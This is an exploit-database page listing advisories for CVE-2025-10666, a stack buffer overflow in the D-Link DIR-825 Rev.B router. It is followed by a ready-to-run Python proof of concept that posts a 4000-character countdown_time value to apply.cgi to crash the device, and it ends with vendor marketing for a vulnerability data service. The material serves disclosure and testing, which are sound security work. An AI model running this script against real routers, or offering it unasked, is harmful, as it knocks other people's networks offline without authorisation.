| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2025-10666 | 18 Sep 202517:27 | – | circl | |
| D-Link DIR-825 安全漏洞 | 18 Sep 202500:00 | – | cnnvd | |
| D-Link DIR-825 Buffer Overflow Vulnerability | 23 Sep 202500:00 | – | cnvd | |
| CVE-2025-10666 | 18 Sep 202513:02 | – | cve | |
| CVE-2025-10666 D-Link DIR-825 apply.cgi sub_4106d4 buffer overflow | 18 Sep 202513:02 | – | cvelist | |
| EUVD-2025-29982 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-10666 | 18 Sep 202513:15 | – | nvd | |
| D-Link DIR-825 Rev B Multiple Vulnerabilities (2019 - 2025) | 6 Feb 202300:00 | – | openvas | |
| 📄 D-Link DIR-825 Rev.B 2.10 Buffer Overflow | 5 Feb 202600:00 | – | packetstorm | |
| PT-2025-38321 | 10 Sep 202500:00 | – | ptsecurity |
# Exploit Title: D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS)
# Google Dork: N/A
# Date: 2025-09-25
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://www.dlink.com/
# Software Link: https://tsd.dlink.com.tw/downloads2008detail.asp
# Version: DIR-825 Rev.B <= 2.10
# Tested on: DIR-825 Rev.B physical hardware, local network
# CVE: CVE-2025-10666
#
# Description:
# A stack-based buffer overflow vulnerability exists in the apply.cgi endpoint of the
# D-Link DIR-825 Rev.B router (firmware <= 2.10), triggered via the countdown_time parameter.
# This PoC sends an overly long POST parameter to crash the process.
import requests
TARGET = "http://192.168.0.1/apply.cgi" # Change this to the router's IP
LENGTH = 4000 # Adjust length for testing / fuzzing
PAYLOAD = "1" * LENGTH
headers = {
"User-Agent": "Mozilla/5.0",
"Content-Type": "application/x-www-form-urlencoded",
"Referer": "http://192.168.0.1/",
}
data = {
"countdown_time": PAYLOAD
}
try:
print(f"[+] Sending exploit payload ({LENGTH} bytes) to {TARGET}")
r = requests.post(TARGET, headers=headers, data=data, timeout=5)
print(f"[+] Status Code: {r.status_code}")
print("[+] Exploit sent. Check if the router crashes or becomes unresponsive.")
except Exception as e:
print(f"[-] Failed to send exploit: {e}")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation